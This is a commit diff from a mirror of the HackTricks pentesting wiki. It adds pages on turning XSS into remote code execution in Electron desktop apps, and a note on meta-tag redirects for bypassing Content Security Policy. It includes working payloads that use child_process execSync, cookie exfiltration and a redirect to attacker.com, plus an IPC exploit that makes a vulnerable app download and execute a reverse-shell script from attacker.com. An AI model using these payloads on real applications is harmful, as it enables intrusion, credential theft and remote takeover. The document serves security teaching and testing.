0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [#3133] No subject

Browse source
This commit is contained in:
CPol 2022-04-28 13:04:05 +00:00 committed by gitbook-bot
parent 59d8dc2310
commit c315f8c82d
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 168 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -282,6 +282,7 @@
* [XSS to RCE Electron Desktop Apps](pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md)
* [Electron contextIsolation RCE via preload code](pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
* [Electron contextIsolation RCE via Electron internal code](pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md)
* [Electron contextIsolation RCE via IPC](pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-ipc.md)
* [88tcp/udp - Pentesting Kerberos](pentesting/pentesting-kerberos-88/README.md)
* [Harvesting tickets from Windows](pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
* [Harvesting tickets from Linux](pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)

8
pentesting-web/content-security-policy-csp-bypass/README.md
View file

@ -364,6 +364,14 @@ var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid;
```
### Meta tag
You could redirect injecting a meta tag (this is just a redirect, this won't leak content)
```html
<meta http-equiv="refresh" content="1; http://attacker.com">
```
### DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for a later usage.\

67
pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md
View file

@ -1,9 +1,16 @@
# XSS to RCE Electron Desktop Apps
Electron is **based on Chromium**, but it is not a browser. Certain principles and security mechanisms implemented by modern browsers are not in place.
Electron is **based on Chromium**, but it is not a browser. Certain principles and security mechanisms implemented by modern browsers are not in place.\
You could see Electron like a local backend+frontend app where **NodeJS** is the **backend** and **chromium** is the **frontend**.
In the source code of an Electron app, inside the `packet.json` you can find specified the `main.js` file where security configs ad set.
```json
{
"name": "standard-notes",
"main": "./app/index.js",
```
Electron has 2 process types:
* Main Process (has complete access to NodeJS)
@ -47,6 +54,7 @@ const mainWindowOptions = {
webPreferences: {
blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
nodeIntegration: false,
contextIsolation: false
preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
nativeWindowOpen: true,
enableRemoteModule: false,
@ -55,6 +63,20 @@ const mainWindowOptions = {
};
```
Some **RCE payloads** from [here](https://7as.es/electron/nodeIntegration\_rce.txt):
```html
Example Payloads (Windows):
<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
Example Payloads (Linux & MacOS):
<img src=x onerror="alert(require('child_process').execSync('gnome-calculator').toString());">
<img src=x onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
<img src=x onerror="alert(require('child_process').execSync('id').toString());">
<img src=x onerror="alert(require('child_process').execSync('ls -l').toString());">
<img src=x onerror="alert(require('child_process').execSync('uname -a').toString());">
```
## RCE: XSS + nodeIntegration
If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Node.js features easily just by calling the `require()`. For example, the way to execute the calc application on Windows is:
@ -125,6 +147,18 @@ There are 2 places where built-int methods can be overwritten: In preload code o
[electron-contextisolation-rce-via-electron-internal-code.md](electron-contextisolation-rce-via-electron-internal-code.md)
{% endcontent-ref %}
{% content-ref url="electron-contextisolation-rce-via-ipc.md" %}
[electron-contextisolation-rce-via-ipc.md](electron-contextisolation-rce-via-ipc.md)
{% endcontent-ref %}
### Bypass click event
If there are restrictions applied when you click a link you might be able to bypass them **doing a middle click** instead of a regular left click
```javascript
window.addEventListener('click', (e) => {
```
## Read Internal Files: XSS + contextIsolation
If `contextIsolation` set to false you can try to use \<webview> (similar to \<iframe> but can load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
@ -157,9 +191,40 @@ window.open("<http://subdomainagoogleq.com/index.html>")
* [**Electronegativity**](https://github.com/doyensec/electronegativity) is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) **** is an open source VS Code plugin for Electron applications that uses Electronegativity.
## Labs
In [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) you can find a lab to exploit vulnerable Electron apps.
Some commands that will help you will the lab:
```bash
# Download apps from these URls
## Vuln to nodeIntegration
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip
## Vuln to contextIsolation via preload script
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip
## Vuln to IPC Rce
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip
# Get inside the electron app and check for vulnerabilities
npm audit
# How to use electronegativity
npm install @doyensec/electronegativity -g
electronegativity -i vulnerable1
# Run an application from source code
npm install -g electron
cd vulnerable1
npm install
npm start
```
## **References**
* [https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028](https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028)
* [https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)
* [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8)
* [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
* [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)
* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)

93
pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-ipc.md Normal file
View file

@ -0,0 +1,93 @@
# Electron contextIsolation RCE via IPC
If the preload script exposes an IPC endpoint from the main.js file, the renderer process will be able to access it and if vulnerable, a RCE might be possible.
**All these examples were taken from here** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo)****
## Example 1
Check how the `main.js` listens on `getUpdate` and will **download and execute any URL** passed.\
Check also how `preload.js` **exposes any IPC** event from main.
```javascript
// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
console.log('getUpdate: ' + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
});
mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
console.log('downloads path=' + app.getPath('downloads'))
console.log('mainWindow.download_url=' + mainWindow.download_url);
url_parts = mainWindow.download_url.split('/')
filename = url_parts[url_parts.length-1]
mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
console.log('downloadPath=' + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)
item.on('updated', (event, state) => {
if (state === 'interrupted') {
console.log('Download is interrupted but can be resumed')
}
else if (state === 'progressing') {
if (item.isPaused()) console.log('Download is paused')
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})
item.once('done', (event, state) => {
if (state === 'completed') {
console.log('Download successful, running update')
fs.chmodSync(mainWindow.downloadPath, 0755);
var child = require('child_process').execFile;
child(mainWindow.downloadPath, function(err, data) {
if (err) { console.error(err); return; }
console.log(data.toString());
});
}
else console.log(`Download failed: ${state}`)
})
})
```
```javascript
// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
```
Exploit:
```html
<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>
```
## Example 2
If the preload script exposes directly to the renderer a way t call shell.openExternal its possible to obtains RCE
```javascript
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url);
};
```
## Example 3
Is the preload script exposes ways to completely communicate with the main process, an XSS will be able to send any event. The impact of this depends on what the main process exposes in terms of IPC.
```javascript
window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb);
};
window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
```